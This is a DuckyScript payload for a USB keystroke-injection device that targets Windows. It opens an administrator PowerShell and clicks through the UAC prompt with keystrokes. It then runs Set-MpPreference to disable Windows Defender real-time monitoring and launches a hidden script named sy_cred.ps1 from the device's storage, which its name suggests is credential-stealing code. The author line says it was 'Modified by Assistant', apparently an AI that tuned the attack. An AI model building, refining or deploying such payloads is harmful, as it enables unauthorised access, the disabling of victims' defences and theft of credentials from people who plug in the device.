ATTACKMODE HID STORAGE
EXTENSION PASSIVE_WINDOWS_DETECT

REM VERSION 1.2
REM AUTHOR: Korben (Modified by Assistant)

REM_BLOCK DOCUMENTATION
    Updated version with additional delays and error handling for opening the .ps1 file.
    This version ensures proper navigation to the CIRCUITPY volume and execution of the script.
END_REM

DEFINE CIRCUITPY
DEFINE sy_cred.ps1

IF ($_OS == WINDOWS) THEN

    DELAY 200
    REM ----- Open PowerShell as Admin -----
    GUI r
    DELAY 500
    STRING powershell
    DELAY 300
    CTRL-SHIFT ENTER
    DELAY 1000
    LEFT
    DELAY 300
    ENTER
    DELAY 1500

    REM ----- Navigate to CIRCUITPY Volume -----
    STRING $duckletter = (Get-CimInstance -ClassName Win32_LogicalDisk | Where-Object { $_.VolumeName -eq 'CIRCUITPY' }).DeviceID
    DELAY 300
    ENTER
    DELAY 800
    STRING cd $duckletter
    DELAY 300
    ENTER
    DELAY 800

    REM ----- Disable Windows Defender -----
    STRING Set-MpPreference -DisableRealtimeMonitoring $true
    DELAY 300
    ENTER
    DELAY 1000

    REM ----- Execute the PowerShell Script -----
    STRING Start-Process powershell.exe -ArgumentList "-NoProfile -WindowStyle Hidden -File .\sy_cred.ps1" -WindowStyle Hidden
    DELAY 300
    ENTER
    DELAY 1500

    REM ----- Exit PowerShell -----
    STRING exit
    DELAY 300
    ENTER

END_IF
